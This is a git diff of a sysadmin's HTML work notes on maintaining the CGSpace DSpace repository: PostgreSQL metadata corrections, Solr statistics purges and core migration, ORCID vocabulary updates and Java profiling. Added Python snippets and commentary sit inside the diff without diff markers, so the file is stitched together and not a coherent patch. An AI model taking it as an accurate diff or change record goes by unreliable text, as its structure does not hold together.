    @@ -374,7 +374,7 @@ $ wc -l hung-nguyen-a*handles.txt
     
     
     
    -
    # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "23/Jan/2020:0[12345678]" | goaccess --log-format=COMBINED -
    +
    # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "23/Jan/2020:0[12345678]" | goaccess --log-format=COMBINED -
     
    • The top two hosts according to the amount of data transferred are:
        @@ -404,9 +404,9 @@ $ convert -thumbnail x600 10568-97925.pdf.jpg 10568-97925-thumbnail.pdf.jpg
      • The file size is about double the old ones, but the quality is very good and the file size is nowhere near ilri.org’s 400KiB PNG!
      • Peter sent me the corrections and deletions for affiliations last night so I imported them into OpenRefine to work around the normal UTF-8 issue, ran them through csv-metadata-quality to make sure all Unicode values were normalized (NFC), then applied them on DSpace Test and CGSpace:
      -
      $ csv-metadata-quality -i ~/Downloads/2020-01-22-fix-1113-affiliations.csv -o /tmp/2020-01-22-fix-1113-affiliations.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
      -$ ./fix-metadata-values.py -i /tmp/2020-01-22-fix-1113-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct
      -$ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
      +
      $ csv-metadata-quality -i ~/Downloads/2020-01-22-fix-1113-affiliations.csv -o /tmp/2020-01-22-fix-1113-affiliations.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
      +$ ./fix-metadata-values.py -i /tmp/2020-01-22-fix-1113-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct
      +$ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
       

      2020-01-26

      • Add “Gender” to controlled vocabulary for CRPs (#442)
      • @@ -426,9 +426,9 @@ $ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db
      • One thing worth mentioning was this syntax for extracting bits from JSON in bash using jq:
      -
      $ RESPONSE=$(curl -s 'https://dspacetest.cgiar.org/rest/handle/10568/103447?expand=bitstreams')
      -$ echo $RESPONSE | jq '.bitstreams[] | select(.bundleName=="ORIGINAL") | .retrieveLink'
      -"/bitstreams/172559/retrieve"
      +
      $ RESPONSE=$(curl -s 'https://dspacetest.cgiar.org/rest/handle/10568/103447?expand=bitstreams')
      +$ echo $RESPONSE | jq '.bitstreams[] | select(.bundleName=="ORIGINAL") | .retrieveLink'
      +"/bitstreams/172559/retrieve"
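For comparison, the same selection can be sketched in Python with only the standard library. The response body below is a hypothetical, trimmed-down sample (the THUMBNAIL entry and its ID are invented for illustration); real REST responses carry many more fields:

```python
import json

# Hypothetical sample of an item response expanded with its bitstreams
response = """
{
  "handle": "10568/103447",
  "bitstreams": [
    {"bundleName": "THUMBNAIL", "retrieveLink": "/bitstreams/172560/retrieve"},
    {"bundleName": "ORIGINAL", "retrieveLink": "/bitstreams/172559/retrieve"}
  ]
}
"""


def original_links(body: str) -> list:
    """Return the retrieveLink of every bitstream in the ORIGINAL bundle."""
    item = json.loads(body)
    return [
        bitstream["retrieveLink"]
        for bitstream in item.get("bitstreams", [])
        if bitstream.get("bundleName") == "ORIGINAL"
    ]


print(original_links(response))  # ['/bitstreams/172559/retrieve']
```

Unlike the jq filter, which prints one JSON string per match, this returns a list, so an item with no ORIGINAL bundle yields an empty list rather than no output.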
       

      2020-01-27

      • Bizu has been having problems when she logs into CGSpace, she can’t see the community list on the front page @@ -439,7 +439,7 @@ $ echo $RESPONSE | jq '.bitstreams[] | select(.bundleName=="ORIGINAL")
      2020-01-27 06:02:23,681 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractRecentSubmissionTransformer @ Caught SearchServiceException while retrieving recent submission for: home page
      -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'read:(g0 OR e610 OR g0 OR g3 OR g5 OR g4102 OR g9 OR g4105 OR g10 OR g4107 OR g4108 OR g13 OR g4109 OR g14 OR g15 OR g16 OR g18 OR g20 OR g23 OR g24 OR g2072 OR g2074 OR g28 OR g2076 OR g29 OR g2078 OR g2080 OR g34 OR g2082 OR g2084 OR g38 OR g2086 OR g2088 OR g43 OR g2093 OR g2095 OR g2097 OR g50 OR g51 OR g2101 OR g2103 OR g62 OR g65 OR g77 OR g78 OR g2127 OR g2142 OR g2151 OR g2152 OR g2153 OR g2154 OR g2156 OR g2165 OR g2171 OR g2174 OR g2175 OR g129 OR g2178 OR g2182 OR g2186 OR g153 OR g155 OR g158 OR g166 OR g167 OR g168 OR g169 OR g2225 OR g179 OR g2227 OR g2229 OR g183 OR g2231 OR g184 OR g2233 OR g186 OR g2235 OR g2237 OR g191 OR g192 OR g193 OR g2242 OR g2244 OR g2246 OR g2250 OR g204 OR g205 OR g207 OR g208 OR g2262 OR g2265 OR g218 OR g2268 OR g222 OR g223 OR g2271 OR g2274 OR g2277 OR g230 OR g231 OR g2280 OR g2283 OR g238 OR g2286 OR g241 OR g2289 OR g244 OR g2292 OR g2295 OR g2298 OR g2301 OR g254 OR g255 OR g2305 OR g2308 OR g262 OR g2311 OR g265 OR g268 OR g269 OR g273 OR g276 OR g277 OR g279 OR g282 OR g292 OR g293 OR g296 OR g297 OR g301 OR g303 OR g305 OR g2353 OR g310 OR g311 OR g313 OR g321 OR g325 OR g328 OR g333 OR g334 OR g342 OR g343 OR g345 OR g348 OR g2409 [...] ': too many boolean clauses
      +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'read:(g0 OR e610 OR g0 OR g3 OR g5 OR g4102 OR g9 OR g4105 OR g10 OR g4107 OR g4108 OR g13 OR g4109 OR g14 OR g15 OR g16 OR g18 OR g20 OR g23 OR g24 OR g2072 OR g2074 OR g28 OR g2076 OR g29 OR g2078 OR g2080 OR g34 OR g2082 OR g2084 OR g38 OR g2086 OR g2088 OR g43 OR g2093 OR g2095 OR g2097 OR g50 OR g51 OR g2101 OR g2103 OR g62 OR g65 OR g77 OR g78 OR g2127 OR g2142 OR g2151 OR g2152 OR g2153 OR g2154 OR g2156 OR g2165 OR g2171 OR g2174 OR g2175 OR g129 OR g2178 OR g2182 OR g2186 OR g153 OR g155 OR g158 OR g166 OR g167 OR g168 OR g169 OR g2225 OR g179 OR g2227 OR g2229 OR g183 OR g2231 OR g184 OR g2233 OR g186 OR g2235 OR g2237 OR g191 OR g192 OR g193 OR g2242 OR g2244 OR g2246 OR g2250 OR g204 OR g205 OR g207 OR g208 OR g2262 OR g2265 OR g218 OR g2268 OR g222 OR g223 OR g2271 OR g2274 OR g2277 OR g230 OR g231 OR g2280 OR g2283 OR g238 OR g2286 OR g241 OR g2289 OR g244 OR g2292 OR g2295 OR g2298 OR g2301 OR g254 OR g255 OR g2305 OR g2308 OR g262 OR g2311 OR g265 OR g268 OR g269 OR g273 OR g276 OR g277 OR g279 OR g282 OR g292 OR g293 OR g296 OR g297 OR g301 OR g303 OR g305 OR g2353 OR g310 OR g311 OR g313 OR g321 OR g325 OR g328 OR g333 OR g334 OR g342 OR g343 OR g345 OR g348 OR g2409 [...] ': too many boolean clauses
       
      • Now this appears to be a Solr limit of some kind (“too many boolean clauses”)
          @@ -453,7 +453,7 @@ org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError:
          • Generate a list of CIP subjects for Abenet:
          -
          dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.cip", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 127 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-28-cip-subjects.csv WITH CSV HEADER;
          +
          dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.cip", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 127 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-28-cip-subjects.csv WITH CSV HEADER;
           COPY 77
           
          • Start looking over the IITA records from earlier this month (IITA_201907_Jan13) @@ -483,33 +483,33 @@ COPY 77
            • Normalize about 4,500 DOI, YouTube, and SlideShare links on CGSpace that are missing HTTPS or using old format:
            -
            UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://www.doi.org%';
            -UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://doi.org%';
            -UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://dx.doi.org%';
            -UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
            -UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.youtube.com', 'https://www.youtube.com') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.youtube.com%';
            -UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.slideshare.net', 'https://www.slideshare.net') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.slideshare.net%';
            +
            UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://www.doi.org%';
            +UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://doi.org%';
            +UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://dx.doi.org%';
            +UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
            +UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.youtube.com', 'https://www.youtube.com') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.youtube.com%';
            +UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.slideshare.net', 'https://www.slideshare.net') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.slideshare.net%';
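The effect of these statements can be tried on individual values before touching the database. The following is a rough Python sketch, not the method used above: it folds the four DOI statements into one anchored pattern (so it would also match `https://www.doi.org`, which the SQL does not), escapes the dots, and uses made-up sample URLs.

```python
import re

# (pattern, replacement) pairs mirroring the UPDATE statements above
RULES = [
    (re.compile(r"^https?://(?:dx\.|www\.)?doi\.org"), "https://doi.org"),
    (re.compile(r"^http://www\.youtube\.com"), "https://www.youtube.com"),
    (re.compile(r"^http://www\.slideshare\.net"), "https://www.slideshare.net"),
]


def normalize_link(url: str) -> str:
    """Rewrite the scheme and host of known link types; return other URLs unchanged."""
    for pattern, replacement in RULES:
        new_url, count = pattern.subn(replacement, url, count=1)
        if count:
            return new_url
    return url


# Hypothetical sample values
print(normalize_link("http://dx.doi.org/10.1000/example"))  # https://doi.org/10.1000/example
print(normalize_link("http://www.youtube.com/watch?v=abc")) # https://www.youtube.com/watch?v=abc
```

Anchoring each pattern at the start of the string plays the role of the `LIKE '...%'` guard in the SQL, so a matching host name embedded later in a value is left alone.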
             
            • I exported a list of all of our ISSNs with item IDs so that I could fix them in OpenRefine and submit them with multi-value separators to DSpace metadata import:
            -
            dspace=# \COPY (SELECT resource_id as "id", text_value as "dc.identifier.issn" FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21) to /tmp/2020-01-29-issn.csv WITH CSV HEADER;
            +
            dspace=# \COPY (SELECT resource_id as "id", text_value as "dc.identifier.issn" FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21) to /tmp/2020-01-29-issn.csv WITH CSV HEADER;
             COPY 23339
             
            • Then, after spending two hours correcting 1,000 ISSNs I realized that I need to normalize the text_lang fields in the database first or else these will all look like changes due to the “en_US” and NULL, etc (for both ISSN and ISBN):
            -
            dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id = 2 AND metadata_field_id IN (20,21);
            +
            dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id = 2 AND metadata_field_id IN (20,21);
             UPDATE 30454
             
            • Then I realized that my initial PostgreSQL query wasn’t so genius because if a field already has multiple values it will appear on separate lines with the same ID, so when dspace metadata-import sees it, the change will be removed and added, or added and removed, depending on the order it is seen!
            • A better course of action is to select the distinct ones and then correct them using fix-metadata-values.py
            -
            dspace=# \COPY (SELECT DISTINCT text_value as "dc.identifier.issn[en_US]", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-29-issn-distinct.csv WITH CSV HEADER;
            +
            dspace=# \COPY (SELECT DISTINCT text_value as "dc.identifier.issn[en_US]", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-29-issn-distinct.csv WITH CSV HEADER;
             COPY 2900
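To illustrate the problem with the per-item export, here is a small Python sketch of what a safe import of that file would have needed: rows sharing an ID must be collapsed into a single value first. The rows are invented, and the `||` separator is an assumption about the multi-value separator configured for metadata import:

```python
from collections import defaultdict

# Hypothetical rows as the per-item export produces them: (item id, ISSN)
rows = [
    (1001, "1234-5678"),
    (1001, "8765-4321"),
    (1002, "0000-0019"),
]


def collapse_multi_values(rows, separator="||"):
    """Join all values that share an item ID into one separator-delimited string."""
    grouped = defaultdict(list)
    for item_id, value in rows:
        grouped[item_id].append(value)
    return {item_id: separator.join(values) for item_id, values in grouped.items()}


print(collapse_multi_values(rows))
# {1001: '1234-5678||8765-4321', 1002: '0000-0019'}
```

Correcting the distinct values instead avoids this step entirely, because each correction is applied to every occurrence of a value regardless of which item holds it.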
             
            • I re-applied all my corrections, filtering out things like multi-value separators and values that are actually ISBNs so I can fix them later
            • Then I applied 181 fixes for ISSNs using fix-metadata-values.py on DSpace Test and CGSpace (after testing locally):
            -
            $ ./fix-metadata-values.py -i /tmp/2020-01-29-ISSNs-Distinct.csv -db dspace -u dspace -p 'fuuu' -f 'dc.identifier.issn[en_US]' -m 21 -t correct -d
            +
            $ ./fix-metadata-values.py -i /tmp/2020-01-29-ISSNs-Distinct.csv -db dspace -u dspace -p 'fuuu' -f 'dc.identifier.issn[en_US]' -m 21 -t correct -d
             

            2020-01-30

            • About to start working on the DSpace 6 port and I’m looking at commits that are in the not-yet-tagged DSpace 6.4: diff --git a/docs/2020-02/index.html b/docs/2020-02/index.html index 2a6625730..9c6d0ae94 100644 --- a/docs/2020-02/index.html +++ b/docs/2020-02/index.html @@ -38,7 +38,7 @@ The code finally builds and runs with a fresh install "/> - + @@ -153,7 +153,7 @@ CREATE EXTENSION pgcrypto;
          -
          dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
          +
          dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
           
          • Then I ran dspace database migrate and got an error:
          @@ -260,17 +260,17 @@ org.dspace.discovery.SearchServiceException: Invalid UUID string: 111210
        • If I look in Solr’s search core I do actually see items with integers for their resource ID, which I think are all supposed to be UUIDs now…
        • I dropped all the documents in the search core:
        -
        $ http --print b 'http://localhost:8080/solr/search/update?stream.body=<delete><query>*:*</query></delete>&commit=true'
        +
        $ http --print b 'http://localhost:8080/solr/search/update?stream.body=<delete><query>*:*</query></delete>&commit=true'
         
        • Still didn’t work, so I’m going to try a clean database import and migration:
        $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspace63
        -$ psql -h localhost -U postgres -c 'alter user dspacetest superuser;'
        +$ psql -h localhost -U postgres -c 'alter user dspacetest superuser;'
         $ pg_restore -h localhost -U postgres -d dspace63 -O --role=dspacetest -h localhost dspace_2020-01-27.backup
        -$ psql -h localhost -U postgres -c 'alter user dspacetest nosuperuser;'
        +$ psql -h localhost -U postgres -c 'alter user dspacetest nosuperuser;'
         $ psql -h localhost -U postgres dspace63                               
         dspace63=# CREATE EXTENSION pgcrypto;
        -dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
        +dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
         dspace63=# DROP VIEW eperson_metadata;
         dspace63=# \q
         $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace63
        @@ -365,22 +365,22 @@ $ podman run --name dspacedb10 -v dspacedb_data:/var/lib/postgresql/data -e POST
         $ createuser -h localhost -U postgres --pwprompt dspacetest
         $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
         $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspace63
        -$ psql -h localhost -U postgres -c 'alter user dspacetest superuser;'
        +$ psql -h localhost -U postgres -c 'alter user dspacetest superuser;'
         $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2020-02-06.backup
         $ pg_restore -h localhost -U postgres -d dspace63 -O --role=dspacetest -h localhost ~/Downloads/cgspace_2020-02-06.backup
         $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
         $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace63
        -$ psql -h localhost -U postgres -c 'alter user dspacetest nosuperuser;'
        +$ psql -h localhost -U postgres -c 'alter user dspacetest nosuperuser;'
         $ psql -h localhost -U postgres dspace63                               
         dspace63=# CREATE EXTENSION pgcrypto;
        -dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
        +dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
         dspace63=# DROP VIEW eperson_metadata;
         dspace63=# \q
         
        • I purged ~33,000 hits from the “Jersey/2.6” bot in CGSpace’s statistics using my check-spider-hits.sh script:
        $ ./check-spider-hits.sh -d -p -f /tmp/jersey -s statistics -u http://localhost:8081/solr
        -$ for year in 2018 2017 2016 2015; do ./check-spider-hits.sh -d -p -f /tmp/jersey -s "statistics-${year}" -u http://localhost:8081/solr; done
        +$ for year in 2018 2017 2016 2015; do ./check-spider-hits.sh -d -p -f /tmp/jersey -s "statistics-${year}" -u http://localhost:8081/solr; done
         
        • I noticed another user agent in the logs that we should add to the list:
        @@ -389,23 +389,23 @@ $ for year in 2018 2017 2016 2015; do ./check-spider-hits.sh -d -p -f /tmp/jerse
      • I made an issue on the COUNTER-Robots repository
      • I found a nice tool for exporting and importing Solr records and it seems to work for exporting our 2019 stats from the large statistics core!
      -
      $ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01.json -f 'dateYearMonth:2019-01' -k uid
      +
      $ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01.json -f 'dateYearMonth:2019-01' -k uid
       $ ls -lh /tmp/statistics-2019-01.json
       -rw-rw-r-- 1 aorth aorth 3.7G Feb  6 09:26 /tmp/statistics-2019-01.json
       
      • Then I tested importing this by creating a new core in my development environment:
      -
      $ curl 'http://localhost:8080/solr/admin/cores?action=CREATE&name=statistics-2019&instanceDir=/home/aorth/dspace/solr/statistics&dataDir=/home/aorth/dspace/solr/statistics-2019/data'
      +
      $ curl 'http://localhost:8080/solr/admin/cores?action=CREATE&name=statistics-2019&instanceDir=/home/aorth/dspace/solr/statistics&dataDir=/home/aorth/dspace/solr/statistics-2019/data'
       $ ./run.sh -s http://localhost:8080/solr/statistics-2019 -a import -o ~/Downloads/statistics-2019-01.json -k uid
       
      • This imports the records into the core, but DSpace can’t see them, and when I restart Tomcat the core is not seen by Solr…
      • I got the core to load by adding it to dspace/solr/solr.xml manually, ie:
      -
        <cores adminPath="/admin/cores">
      +
        <cores adminPath="/admin/cores">
         ...
      -    <core name="statistics" instanceDir="statistics" />
      -    <core name="statistics-2019" instanceDir="statistics">
      -        <property name="dataDir" value="/home/aorth/dspace/solr/statistics-2019/data" />
      +    <core name="statistics" instanceDir="statistics" />
      +    <core name="statistics-2019" instanceDir="statistics">
      +        <property name="dataDir" value="/home/aorth/dspace/solr/statistics-2019/data" />
           </core>
         ...
         </cores>
      @@ -439,7 +439,7 @@ $ make
       $ ./bin/create-links-in ~/.local/bin
       $ export FLAMEGRAPH_DIR=/home/aorth/src/git/FlameGraph
       $ export JAVA_HOME=/usr/lib/jvm/java-8-openjdk
      -$ export JAVA_OPTS="-XX:+PreserveFramePointer"
      +$ export JAVA_OPTS="-XX:+PreserveFramePointer"
       $ ~/dspace63/bin/dspace index-discovery -b &
       # pid of tomcat java process
       $ perf-java-flames 4478
      @@ -485,12 +485,12 @@ schedtool -D -e ~/dspace63/bin/dspace index-discovery -b  5112.96s user 127.80s
       
    $ export JAVA_HOME=/usr/lib/jvm/java-8-openjdk
     $ export PERF_RECORD_SECONDS=60
    -$ export JAVA_OPTS="-XX:+PreserveFramePointer"
    +$ export JAVA_OPTS="-XX:+PreserveFramePointer"
     $ time schedtool -D -e ~/dspace/bin/dspace index-discovery -b &
     # process id of java indexing process (not Tomcat)
     $ perf-java-record-stack 169639
     $ sudo perf script -i /tmp/perf-169639.data > out.dspace510-1
    -$ cat out.dspace510-1 | ../FlameGraph/stackcollapse-perf.pl | grep -E '^java' | ../FlameGraph/flamegraph.pl --color=java --hash > out.dspace510-1.svg
    +$ cat out.dspace510-1 | ../FlameGraph/stackcollapse-perf.pl | grep -E '^java' | ../FlameGraph/flamegraph.pl --color=java --hash > out.dspace510-1.svg
     
    • All data recorded on my laptop with the same kernel, same boot, etc.
    • CGSpace 5.8 (with Atmire patches):
    • @@ -525,14 +525,14 @@ $ cat out.dspace510-1 | ../FlameGraph/stackcollapse-perf.pl | grep -E '^java' |
      • Maria from Bioversity asked me to add some ORCID iDs to our controlled vocabulary so I combined them with our existing ones and updated the names from the ORCID API:
      -
      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2020-02-11-combined-orcids.txt
      +
      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2020-02-11-combined-orcids.txt
       $ ./resolve-orcids.py -i /tmp/2020-02-11-combined-orcids.txt -o /tmp/2020-02-11-combined-names.txt -d
       # sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
       $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
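The combine-and-deduplicate step above can also be sketched in Python. This is only an illustration of the same regular expression as the `grep -oE` call; the function name `extract_unique_orcids` and the sample input (including the XML-like line) are assumptions made for the example, not part of the CGSpace scripts.

```python
import re

# Same shape as the grep -oE pattern above: four dash-separated groups
# of four uppercase letters or digits.
ORCID_PATTERN = re.compile(r"[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}")


def extract_unique_orcids(text):
    """Return the sorted, de-duplicated ORCID iDs found anywhere in text."""
    return sorted(set(ORCID_PATTERN.findall(text)))


# Hypothetical input: one vocabulary-style line plus two bare identifiers.
sample = """
<node id="Anne Rietveld: 0000-0002-9400-9473" label="Anne Rietveld: 0000-0002-9400-9473"/>
0000-0003-3120-8560
0000-0002-9400-9473
"""

for orcid in extract_unique_orcids(sample):
    print(orcid)
```

Using a set before sorting plays the role of `sort | uniq`, so an identifier that appears in both input files is only resolved once.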
       
      • Then I noticed some author names had changed, so I captured the old and new names in a CSV file and fixed them using fix-metadata-values.py:
      -
      $ ./fix-metadata-values.py -i 2020-02-11-correct-orcid-ids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -t correct -m 240 -d
      +
      $ ./fix-metadata-values.py -i 2020-02-11-correct-orcid-ids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -t correct -m 240 -d
       
      • On a hunch I decided to try to add these ORCID iDs to existing items that might not have them yet
          @@ -541,22 +541,22 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
        dc.contributor.author,cg.creator.id
        -"Staver, Charles",charles staver: 0000-0002-4532-6077
        -"Staver, C.",charles staver: 0000-0002-4532-6077
        -"Fungo, R.",Robert Fungo: 0000-0002-4264-6905
        -"Remans, R.",Roseline Remans: 0000-0003-3659-8529
        -"Remans, Roseline",Roseline Remans: 0000-0003-3659-8529
        -"Rietveld A.",Anne Rietveld: 0000-0002-9400-9473
        -"Rietveld, A.",Anne Rietveld: 0000-0002-9400-9473
        -"Rietveld, A.M.",Anne Rietveld: 0000-0002-9400-9473
        -"Rietveld, Anne M.",Anne Rietveld: 0000-0002-9400-9473
        -"Fongar, A.",Andrea Fongar: 0000-0003-2084-1571
        -"Müller, Anna",Anna Müller: 0000-0003-3120-8560
        -"Müller, A.",Anna Müller: 0000-0003-3120-8560
        +"Staver, Charles",charles staver: 0000-0002-4532-6077
        +"Staver, C.",charles staver: 0000-0002-4532-6077
        +"Fungo, R.",Robert Fungo: 0000-0002-4264-6905
        +"Remans, R.",Roseline Remans: 0000-0003-3659-8529
        +"Remans, Roseline",Roseline Remans: 0000-0003-3659-8529
        +"Rietveld A.",Anne Rietveld: 0000-0002-9400-9473
        +"Rietveld, A.",Anne Rietveld: 0000-0002-9400-9473
        +"Rietveld, A.M.",Anne Rietveld: 0000-0002-9400-9473
        +"Rietveld, Anne M.",Anne Rietveld: 0000-0002-9400-9473
        +"Fongar, A.",Andrea Fongar: 0000-0003-2084-1571
        +"Müller, Anna",Anna Müller: 0000-0003-3120-8560
        +"Müller, A.",Anna Müller: 0000-0003-3120-8560
         
        • Running the add-orcid-identifiers-csv.py script I added 144 ORCID iDs to items on CGSpace!
        -
        $ ./add-orcid-identifiers-csv.py -i /tmp/2020-02-11-add-orcid-ids.csv -db dspace -u dspace -p 'fuuu'
        +
        $ ./add-orcid-identifiers-csv.py -i /tmp/2020-02-11-add-orcid-ids.csv -db dspace -u dspace -p 'fuuu'
         
        • Minor updates to all Python utility scripts in the CGSpace git repository
        • Update the spider agent patterns in CGSpace 5_x-prod branch from the latest COUNTER-Robots project
        @@ -575,7 +575,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
        • Peter asked me to update John McIntire’s name format on CGSpace so I ran the following PostgreSQL query:
        -
        dspace=# UPDATE metadatavalue SET text_value='McIntire, John M.' WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value='McIntire, John';
        +
        dspace=# UPDATE metadatavalue SET text_value='McIntire, John M.' WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value='McIntire, John';
         UPDATE 26
         

        2020-02-17

          @@ -622,10 +622,10 @@ UPDATE 26
      -
      $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=dns:/squeeze3.bronco.co.uk./&rows=0"
      -<?xml version="1.0" encoding="UTF-8"?>
      +
      $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=dns:/squeeze3.bronco.co.uk./&rows=0"
      +<?xml version="1.0" encoding="UTF-8"?>
       <response>
      -<lst name="responseHeader"><int name="status">0</int><int name="QTime">4</int><lst name="params"><str name="q">dns:/squeeze3.bronco.co.uk./</str><str name="rows">0</str></lst></lst><result name="response" numFound="86044" start="0"></result>
      +<lst name="responseHeader"><int name="status">0</int><int name="QTime">4</int><lst name="params"><str name="q">dns:/squeeze3.bronco.co.uk./</str><str name="rows">0</str></lst></lst><result name="response" numFound="86044" start="0"></result>
       </response>
       
      • The totals in each core are:
      @@ -641,8 +641,8 @@ UPDATE 26
      • I will purge them from each core one by one, ie:
      -
      $ curl -s "http://localhost:8081/solr/statistics-2015/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:squeeze3.bronco.co.uk.</query></delete>"
      -$ curl -s "http://localhost:8081/solr/statistics-2014/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:squeeze3.bronco.co.uk.</query></delete>"
      +
      $ curl -s "http://localhost:8081/solr/statistics-2015/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:squeeze3.bronco.co.uk.</query></delete>"
